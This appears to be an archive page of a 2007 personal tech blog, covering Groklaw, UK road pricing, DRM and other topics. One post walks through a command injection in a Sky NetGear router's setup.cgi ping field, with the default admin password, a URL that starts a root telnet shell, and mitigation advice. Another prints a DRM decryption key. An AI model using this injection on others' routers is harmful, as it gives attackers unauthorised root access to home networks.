Email Address Password
Remember Me

Or Create a (Free) Account.
2004JanFebMarAprMayJunJul Aug Sep Oct Nov Dec
2005 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
2006 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Oct Oct
2007JanFebMarAprMayJunJulAugSepOctNovDec2007
2008JanFebMarAprMayJunJulAugSepOctNovDec2008
2009JanFebMarAprMayJunJulAugSepOctNovDec2009
2010JanFebMarAprMayJunJulAugSepOctNovDec2010
2011JanFebMarAprMayJunJulAugSepOctNovDec2011
2012JanFebMarAprMayJunJulAugSepOctNovDec2012
2013JanFebMarAprMayJunJulAugSepOctNovDec2013
2014JanFebMarAprMayJunJulAugSepOctNovDec2014

Wed 28th Feb 2007 @ 00:14 2007: An Inconvenient Gore

Al Gore Pulls Plug On Internet, Claims "It's Not Working Out"

(Oh yeah, Al Gore invented the Internet). This came up in a discussion with my parents recently, and apparently they were unaware of Mr. Gore's contribution. I guess it's a 1990s thing. Shame, really, because it was a good running joke.

Post a Comment               

Tue 27th Feb 2007 @ 00:12 2007: Groklaw - RAID card?!

http://www.groklaw.net/ is down because "Sorry, there are hardware problems with the database server, the RAID card is fried. Prognosis is that it will take till tomorrow EST to fix the machine. Groklaw will be down until then."

Surely a site with that much traffic must have greater resilience than a single machine with a single RAID card? It's been running fine since 2003, so is it really a single server which has managed a 4-year uptime?

Given a fried RAID card, there is no server to stand-in in the meantime?

It feels somewhat "unpatriotic" to the FLOSS community to by cynical of Groklaw, but I always have been; I hope that I am wrong, but it does all seem suspiciously convenient how Groklaw arrived out of nowhere, doing everything right, just at the right time. This criticism, which I hadn't come across until I started looking for other info about Groklaw is new to me, but fits conceptually with my view of Groklaw, for the little that that is worth.

I do have a few, very high-level questions:

  • How does PJ pay her bills?
  • Where does she live?
  • If she works for OSRM, can't SCO find her via her employer?
  • Okay, if she's working for OSRM now, who paid her bills previously?
  • Having refuted so many of SCO's claims, why run and hide now?

These all seem to be reasonable questions of accountability; as a great website providing excellent refutations of SCO's claims, provided as-is, for free, at her own cost, then why run away?

I'm sorry if this sounds overly cynical, but I just don't buy the Groklaw story. I'd love it to be true, and if I ever meet PJ, I'll buy her a drink for all her hard work, but to a casual observer (and I am no more than that), it is all starting to look a bit shady.

I don't want the SCO case to lose because of underhand dealings by IBM or any other party; I want it to lose because it is the deranged ramblings of a madman (which it clearly is).

2 Comments               

Thu 22nd Feb 2007 @ 00:22 2007: Travel Tax - the response from Number 10

For the 1.8m or so who signed the Travel Tax petition on "Tony Blair's website" (http://www.pm.gov.uk/ - yes, he does get his own website; no, that doesn't mean that it's a media-driven government, honest!), the response is in. Yes, he's spammed 1.8m citizens (and yes, my spam filters caught it as spam, it's only because I heard about it on the radio that I trawled through and found it):


Thank you for taking the time to register your views about road pricing on the Downing Street website.

This petition was posted shortly before we published the Eddington Study, an independent review of Britain's transport network. This study set out long-term challenges and options for our transport network.

It made clear that congestion is a major problem to which there is no easy answer. One aspect of the study was highlighting how road pricing could provide a solution to these problems and that advances in technology put these plans within our reach. Of course it would be ten years or more before any national scheme was technologically, never mind politically, feasible.

Don't worry yourselves about the other aspects of the study, let alone the assumption that, just because something may (in future) be feasible, then it should be decided upon now.

That is the backdrop to this issue. As my response makes clear, this is not about imposing "stealth taxes" or introducing "Big Brother" surveillance. This is a complex subject, which cannot be resolved without a thorough investigation of all the options, combined with a full and frank debate about the choices we face at a local and national level. That's why I hope this detailed response will address your concerns and set out how we intend to take this issue forward. I see this email as the beginning, not the end of the debate, and the links below provide an opportunity for you to take it further.

But let me be clear straight away: we have not made any decision about national road pricing. Indeed we are simply not yet in a position to do so. We are, for now, working with some local authorities that are interested in establishing local schemes to help address local congestion problems. Pricing is not being forced on any area, but any schemes would teach us more about how road pricing would work and inform decisions on a national scheme. And funds raised from these local schemes will be used to improve transport in those areas.

So any scheme, whether it used pricing or not would teach us about how pricing would work. Presumably it will also tell you how allowing only red cars to use the road, would work? Just because you're not testing it, doesn't mean that you can't learn about how it would work.

One thing I suspect we can all agree is that congestion is bad. It's bad for business because it disrupts the delivery of goods and services. It affects people's quality of life. And it is bad for the environment. That is why tackling congestion is a key priority for any Government.

Congestion is predicted to increase by 25% by 2015. This is being driven by economic prosperity. There are 6 million more vehicles on the road now than in 1997, and predictions are that this trend will continue.

Part of the solution is to improve public transport, and to make the most of the existing road network. We have more than doubled investment since 1997, spending 2.5 billion this year on buses and over 4 billion on trains - helping to explain why more people are using them than for decades. And we're committed to sustaining this investment, with over 140 billion of investment planned between now and 2015. We're also putting a great deal of effort into improving traffic flows - for example, over 1000 Highways Agency Traffic Officers now help to keep motorway traffic moving.

Ah, so the basic problem behind congestion is that Blair has made us all richer, so we've got more cars. Apparently they're also spending 6.5bn/year of our money on public transport (even though it's been sold off), and I personally don't see any benefit, other than the Virgin trains (which can now get from Manchester to London in just under 2 hours) - but that's a Virgin investment, not a Gov.UK investment.

But all the evidence shows that improving public transport and tackling traffic bottlenecks will not by themselves prevent congestion getting worse. So we have a difficult choice to make about how we tackle the expected increase in congestion. This is a challenge that all political leaders have to face up to, and not just in the UK. For example, road pricing schemes are already in operation in Italy, Norway and Singapore, and others, such as the Netherlands, are developing schemes. Towns and cities across the world are looking at road pricing as a means of addressing congestion.

It's also not that the UK Gov are being particularly devious; Johnny Foreigner has already done "it" though what "it" means isn't clear; the UK Gov already have "road pricing schemes" if you include the M6 Toll Road, the Newcastle Tunnel, etc, so maybe the Italians, Norwegians, etc, got theirs through by saying that "the Brits are already doing it". Toll roads go back all the way to the Billy Goats Gruff, and are surely something that a centralised government should be eradicating, not perpetuating. (Why do I have to pay 5.10 to go to Wales on the M4?)

One option would be to allow congestion to grow unchecked. Given the forecast growth in traffic, doing nothing would mean that journeys within and between cities would take longer, and be less reliable. I think that would be bad for businesses, individuals and the environment. And the costs on us all will be real - congestion could cost an extra 22 billion in wasted time in England by 2025, of which 10-12 billion would be the direct cost on businesses.

A second option would be to try to build our way out of congestion. We could, of course, add new lanes to our motorways, widen roads in our congested city centres, and build new routes across the countryside. Certainly in some places new capacity will be part of the story. That is why we are widening the M25, M1 and M62. But I think people agree that we cannot simply build more and more roads, particularly when the evidence suggests that traffic quickly grows to fill any new capacity.

Tackling congestion in this way would also be extremely costly, requiring substantial sums to be diverted from other services such as education and health, or increases in taxes. If I tell you that one mile of new motorway costs as much as 30m, you'll have an idea of the sums this approach would entail.

So, if the question is that (because we're all now so rich under New Labour) we've got 6 million more vehicles on the road since 1997, then the answer is obviously not to build sufficient roads to accomodate them. It's to tax the hell out of the motorist.

That is why I believe that at least we need to explore the contribution road pricing can make to tackling congestion. It would not be in anyone's interests, especially those of motorists, to slam the door shut on road pricing without exploring it further.

It has been calculated that a national scheme - as part of a wider package of measures - could cut congestion significantly through small changes in our overall travel patterns. But any technology used would have to give definite guarantees about privacy being protected - as it should be. Existing technologies, such as mobile phones and pay-as-you-drive insurance schemes, may well be able to play a role here, by ensuring that the Government doesn't hold information about where vehicles have been. But there may also be opportunities presented by developments in new technology. Just as new medical technology is changing the NHS, so there will be changes in the transport sector. Our aim is to relieve traffic jams, not create a "Big Brother" society.

No, we mustn't stop them just because the idea is crazy. Indeed, we should embrace the craziness and extend it to allowing not just the government, but private industry to spy on us, too.

I know many people's biggest worry about road pricing is that it will be a "stealth tax" on motorists. It won't. Road pricing is about tackling congestion.

Right, Tony. Sure. You're just trying to make life better for me. This is the sort of argument which says that "congestion is a problem; the other motorists shouldn't be on this road when I need it". The thing is, everyone in the traffic jam is thinking exactly the same thing. Some of them can add "(and I can afford to pay to be here, if necessary)" whilst others (including key workers - teachers, nurses, etc) cannot. Is it more important that a stockbroker gets to his meeting on time, or that a teacher is in the classroom on time? Or is that getting too "political" for New Labour?

Clearly if we decided to move towards a system of national road pricing, there could be a case for moving away from the current system of motoring taxation. This could mean that those who use their car less, or can travel at less congested times, in less congested areas, for example in rural areas, would benefit from lower motoring costs overall. Those who travel longer distances at peak times and in more congested areas would pay more. But those are decisions for the future. At this stage, when no firm decision has been taken as to whether we will move towards a national scheme, stories about possible costs are simply not credible, since they depend on so many variables yet to be investigated, never mind decided.

See this nice juicy carrot? You know how we've been pushing up your road tax over the past few years? There could be a case (tr: won't be a case) for ditching it.

Still, in the meantime, we don't need to work out what it will mean in practice, we just need to agree that we will do it.

Before we take any decisions about a national pricing scheme, we know that we have to have a system that works. A system that respects our privacy as individuals. A system that is fair. I fully accept that we don't have all the answers yet. That is why we are not rushing headlong into a national road pricing scheme. Before we take any decisions there would be further consultations. The public will, of course, have their say, as will Parliament.

We want to continue this debate, so that we can build a consensus around the best way to reduce congestion, protect the environment and support our businesses. If you want to find out more, please visit the attached links to more detailed information, and which also give opportunities to engage in further debate.

That's good. This is clearly a genuine debate between yourself (Tony) and myself (Steve). I'll forward you this URL, I'm sure you're interested in my views.

Yours sincerely,

Tony Blair

Both the 10 Downing Street and Department for Transport websites offer much more information about road pricing.
This includes a range of independent viewpoints, both for and against.
You can also read the Eddington Report in full.
You can reply to this email by posting a question to Roads Minister Dr. Stephen Ladyman in a webchat on the No 10 website this Thursday.
There will be further opportunities in the coming months to get involved in the debate. You will receive one final e-mail from Downing Street to update you in due course.
If you would like to opt out of receiving further mail on this or any other petitions you signed, please email optout@petitions.pm.gov.uk

Regards,

Steve Parker

I note that the Webchat with Stephen Ladyman has been mentioned, though buried in the middle of the "links" section. Shame they don't seem to mention what time; http://www.pm.gov.uk/output/Page11046.asp says that it's "from 4pm".

2 Comments               

Thu 15th Feb 2007 @ 21:50 2007: Sky NetGear DG834GT

The Sky-branded NetGear DG384GT has a customised firmware (it's Linux 2.6.8.1, to be precise). Mine, at least, is version "V1.02.28" (as reported by "/start.htm"). Sky have taken the NetGear code and tweaked it somewhat. They include your account details, which is a nice touch. They also harden it a little better than the default NetGear (see SecurityFocus (from Aug 2004)).

So: go to http://192.168.0.1/, login as "admin", default password is "sky" (Sky don't even tell you that much information... they don't even say that there is a web front-end, let alone that it requires a password.)

Then (once authenticated), paste in this URL:

http://192.168.0.1/setup.cgi?todo=ping_test&c4_IPAddr=localhost%26%2Fusr%2Fbin%2Futelnetd%20-l%20%2Fbin%2Fsh%26

What does this mean? Expanding out the hex escapes:

ping_test?c4_IPAddr=localhost&/usr/bin/utelnetd -l /bin/sh&

This gets passed to setup.cgi's "ping" facility, which obviously does the following (pseudocode):
ping ${c4_IPAddr}

Which expands to
ping localhost & /usr/bin/utelnetd -l /bin/sh &

which of course, kicks off utelnetd with a "login" command of /bin/sh (instead of the usual /bin/login, which would ask you for a password, but we don't have a password). The webpage you'll be presented with will be blank, but it is of no significance anyway.

Now you can telnet to the box:
desktop$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

BusyBox v1.00 (2006.04.26-07:02+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#
And that's it, we're in as root. Set your PATH to include /bin:/usr/bin:/sbin:/usr/sbin.

Thanks to Phil Bridges for pointing me in the direction of the basic route in; he doesn't mention wanting to get shell access, but this is the way.

Since this could (potentially) be a way to bluff our way in to somebody else's router (though it is no worse than the existing exploit), I have inserted a little typo.

The already-documented hack (Aug 2004) to enable telnet doesn't seem to go all the way with this particular box, because there is no root password, which seems to mean that it won't accept *anything* (no, not even nothing) as the root password. The only other account is "nobody". If you have tried the other hack, then telnet will already be running, so just reboot the box (or use Phil's technique; you'll need to get the output of "ps" and then run a "kill -9 3083" (or whatever the PID is)).

So, congrats to Sky for fixing the known problem. Now please fix setup.cgi ... never trust user input. Actually, I'm glad it is broken, because it gives me a way in to my own box, but longer-term, it would be better if it were fixed

Just for the record, I'm not publishing a new flaw, setup.cgi is already well-enough documented, and as I look on Google now, has even been scripted. So, the only "news" here (and it may not even be news to some people) is that it is possible to get a telnet shell on a Sky NetGear box from a single URL.

Mitigating factor: The admin password is required.

Downside #1: Since Sky don't tell customers what the password is, they are not able to change it to something more secure.

Downside #2: It's easy to find out that it is "sky".

Suggested actions for Sky Broadband Customers (all possible via the provided web-based front-end)
  • Change your password from the default "sky" (this is an example of an instance whereby you could get away with making it unique and writing it down - maybe on the bottom of the router itself, or use the password that Sky have provided you with)
  • Don't ever enter that password if prompted to do so (unless you are explicitly and deliberately making changes to your router)
  • Configure the firewall to block all access to port tcp/23, under all circumstances.


Suggestions to Sky (in no particular order):
  • Remove utelnetd if it's not needed
  • Fix (or get NetGear to fix) setup.cgi
  • Tell users how to log in to the box
  • Better still, tell them (even make it necessary for a succesful connection) to change the password from the default.
  • Randomise the admin password on every box (you already customise it with user-specific login details)
  • Block port tcp/23 by default
  • Ensure that incoming tcp/23 to the router itself is always dropped (not much use, as other ports can be specified on the command-line, unless you also reconfigure utelnetd itself)

I would be inclined to force iptables to block INPUT tcp/23 regardless (feel free to FORWARD it), and build utelnetd so that it can only listen on port 23.

4 Comments               

Tue 13th Feb 2007 @ 23:20 2007: 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

Oh dear, did I just tell you all that hex?

I'm probably going down under the DMCA.

Yes, my friends, that majestic code is what is protecting the $megabillions that the MPAA "loses" in piracy.

Of course, I wouldn't link to a nasty site like doom9, would I (http://forum.doom9.org/showthread.php?t=121866&page=6)

It seems that the keys were wiped from memory (so that debuggers wouldn't find the key) in such a way as to actually clearly flag its location:


But then I realized why I first didn't find the Media Key: it was removed from memory after the Volume ID was retrieved and the VUK calculated. I also saw that in my "corrupt" memdump the VUK, Vol ID, Media Key and the Title Key MAC were all closely clustered in memory: in the first 50kb (of the entire multi megabyte file!) but there were large empty parts around it. Almost as if it was cleaned up.

So, from years of design, who knows how many dollars spent, the implementation involves a schoolboy error.

Why do they bother with DRM? I realise that there is a need to make it look as if you're trying to "do something about the perceived problem", but when everybody knows that it's pointless, why bother? (Oh yeah, I've linked to the answer before, I think. If not, it's well worth reading)

If only Hollywood movies were as interesting ...

BoingBoing have editorialised it here.

3 Comments               

Fri 9th Feb 2007 @ 23:43 2007: RIP Watford Electronics

It sounds like the end of Watford Electronics, going the way of Elonex and whoever else was in the UK PC industry. (Apricot, anyone?). I have fond memories of WE taking out huge 12-page-or-more adverts in, erm, Personal Computer World magazine, I think, with the green stripes at the edge of the page, which meant that you could find the WE adverts more easily than you could find the publisher's articles. Every month I'd drool at what they had to offer, and occasionally even have the opportunity to buy something. Ah, these are sad times for the UK IT industry. Are ARM still down in Cambridge? They've got a lot of cred. Apart from that, are we even doing anything in the UK any more?

We don't need any more Amstrads or Sinclairs; what can we really achieve in the UK? I know that our car manufacturing industry has gone to seed (and to the East), but we've got a great history of great engineering boffins. Do they all work for ARM?!

Post a Comment               

Fri 9th Feb 2007 @ 13:52 2007: Noooooo!

Walk This Way

For the love of all that is good in the world, don't do it!

2 Comments               

Thu 8th Feb 2007 @ 01:00 2007: Printers

I'm sure that anybody geeky enough to follow this blog is aware of (http://www.eff.org/Privacy/printers/) the fact that certain (particularly colour laser) printers leave a little "signature" behind, often in the form of tiny yellow dots, marking the date, time, and printer serial number.

What I didn't know is that they'd got enough information to not just interpret, but decode DocuColour printers:

http://www.eff.org/Privacy/printers/docucolor/

Whilst there's a certain benefit in catching stupid counterfeiters, is it really necessary to brand consumer goods (and their output) in this way?

To revert to the theme of the previous post, is it the copyright holder, or the MegaCorp, who is really being protected by such technologies?

Post a Comment               

Wed 7th Feb 2007 @ 22:38 2007: Apple - Thoughts on Music

Steve Jobs has written an article saying that If the big four music companies would license Apple their music without the requirement that it be protected with a DRM, we would switch to selling only DRM-free music on our iTunes store. Every iPod ever made will play this DRM-free music.

It's easy for him to say; Apple will sell iPods whether they use DRM or not - indeed, they may even sell more than before (though, as he points out, they can already play non-DRM'd files, and only about 22% of songs on iPods use DRM)

But it's still a pretty bold statement to make to the RIAA. I think that that "22%" figure is the key point of the article; it's not just a statistic thrown in as part of a larger discussion, it feels more like the entire reason for publishing the article, IMHO. It's a big stick to hit the RIAA with: "It turns out that we don't need your licensing deals to sell iPods," whilst at the same time coming across to the consumer as if they're fighting for consumers' rights, not just for Apple's profits.

Still, it's good to have a "big name" on record (so to speak) pointing out that DRM is mostly a awaste of time and effort.

1 Comment               

Tue 6th Feb 2007 @ 11:31 2007: More Chip and Pin fraud opportunities

Those boffins at Cambridge have come up with a new way in which Chip-and-Pin credit cards can be defrauded:

http://www.lightbluetouchpaper.org/2007/02/06/chip-pin-relay-attacks/

Banks have previously claimed that if a fraudulent Chip & PIN transaction was placed, then the customer must have been negligent in protecting their card and PIN, and so must be liable. This work shows that despite customers taking all due care in using their card, they can still be the victim of fraud.


They will be showing the attack on BBC 1's "Watchdog" programme tonight, 7pm, for those of us in the UK.

Post a Comment               

Mon 5th Feb 2007 @ 23:50 2007: Lies, Damned Lies, and Statistics

I came across this post from the Mathematical Association of America in December, and have been meaning to get around to doing a writeup. However, I'm too lazy, so here goes:

The original post: Statisticians Not Wanted; apparently in California, the Judges, not the Statisticians, will now decide how to interpret statistics. That sounds worrying, given that very few people seem to understand the basics of mean/median/mode, and how figures can be skewed.

"Whether evidence has less probative value or more probative value is a legal evaluation, not a scientific one. Nothing prevents scientists from debating the issue, but its evaluation and resolution is reserved for the judiciary alone."


The followup post, Damned Lies deals with some feedback the original article provoked, including some from Californian lawyers.

So... the lawyers reckon that they understand statistics, and more significantly, how to interpret them, better than the statisticians themselves do. This is a worrying trend, particularly as the context here is DNA matching, a politically controversial topic already, with the ID Card debate, Passports, Immigration Controls and other parties interested in "identifying" individuals.

I'm no maths expert myself (though I know that at least one Maths grad reads this blog), but if "AB01 ABC" is a valid UK license plate, and that there are (say) 10m valid UK license plates, then the odds of "AB01 ABC" being a particular car are 1:10m; however, if I go to a dodgy garage and make up my own "AB01 ABC" plate, then the figure has doubled to 2:10m. I can drive whatever speed I like past speed cameras without fear of being caught (as the DVLA are sure that there is only one "AB01 ABC", and that they already know who it is).

DNA is harder to forge, of course. However, they only sample a subset of the DNA, and therefore arguing, not that "Well, the speeder had a plate saying 'AB01 ABC', and your car has a plate saying 'AB01 ABC', so it must have been you", but instead, they are saying "Well, the speeder had a plate which ended with 'ABC', and your plate ends with 'ABC', so it must have been you." That's a far weaker argument,

Post a Comment               

Fri 2nd Feb 2007 @ 00:42 2007: Ho ho ho

Yet another "Linux isn't ready for 'the enterprise' because it doesn't work with {random undocumented proprietary MS protocol}" post

He loses credibility by Paragraph 4, claiming that "Sun came out with the first versions of StarOffice" - strange that it had already got to version 5.1 by then, thanks to its owner, StarDivision, before Sun bought it and opensourced all that was possible to opensource.

Thing is, most of the comments seem to point out that his definition of "Enterprise" seems to be "Works as a clone of MS Outlook". I've heard lots of definitions of "Linux" (and of "GNU/Linux"), but I don't think that any of them were "MS Outlook replacement".

Reading the comments could be quite entertaining, if they weren't so repetitive as to become actually quite boring.

Mwah. I can't be bothered to put the effort into replying to such non-arguments. Still, those who did bother, have some decent comments.

Post a Comment               

Steve's urandom blog
Share on Twitter Share on Facebook Share on LinkedIn Share on Identi.ca Share on StumbleUpon
My Shell Scripting Book:
    Shell Scripting, Expert Recipes for Linux, Bash and more
is available online and from all good booksellers:


DefectiveByDesign.org